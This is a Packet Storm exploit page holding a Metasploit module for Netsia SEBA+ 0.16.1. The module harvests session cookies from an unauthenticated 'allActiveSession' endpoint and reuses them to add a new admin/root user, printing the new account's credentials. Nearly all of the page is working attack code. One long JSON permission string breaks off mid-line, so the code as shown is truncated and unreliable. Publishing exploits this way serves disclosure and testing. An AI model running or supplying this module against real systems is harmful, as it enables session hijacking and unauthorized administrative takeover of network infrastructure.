exploit the possibilities

Netsia SEBA+ 0.16.1 Authentcation Bypass / Add Root User

Netsia SEBA+ 0.16.1 Authentcation Bypass / Add Root User
Posted Jan 15, 2021
Authored by AkkuS | Site metasploit.com

This Metasploit module exploits an authentication bypass in Netsia SEBA+ versions 0.16.1 and below to add a root user.

tags | exploit, root, bypass
MD5 | 48e1d8f9d10632c1de0461c5d272f23d

Netsia SEBA+ 0.16.1 Authentcation Bypass / Add Root User

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
'Description' => %q{
This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
can be performed without the need for any session(cookie) information.
Therefore, the session cookie informations of the active users in the application can be read from the response content.
A new authorized user can be created with the obtained cookie.
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
[ 'URL', 'https://www.netsia.com' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "2021-01-06",
'DefaultOptions' => { 'SSL' => true }
))

register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
])
end

def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end

def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)

rescue
return Exploit::CheckCode::Unknown
end

if res.code == 200 and res.body.include? 'sessionId'
return Exploit::CheckCode::Vulnerable
else
if res.code == 200 and res.body.include? 'SUCCESS'
print_status("Target is vulnerable! But active admin session was not found. Try again later.")
return Exploit::CheckCode::Appears
end
end

return Exploit::CheckCode::Safe
end

def count_user(data, find_string)
data.scan(/(?=#{find_string})/).count
end

def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")

cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
puts cookies
$i = 0

while $i <= sescount do
sessloop = cookies[$i]
sessid = "SESSION=" + sessloop.to_s
cookie = sessid.split('"]').join('').split('["').join('')
$i +=1
json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subsc

res = send_request_raw({
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
'cookie' => cookie,
'data' => json_data
})

if res.code == 200 and res.body.include? '"SUCCESS"'
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
break
end
end
end
end

Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    13 Files
  • 5
    Mar 5th
    9 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close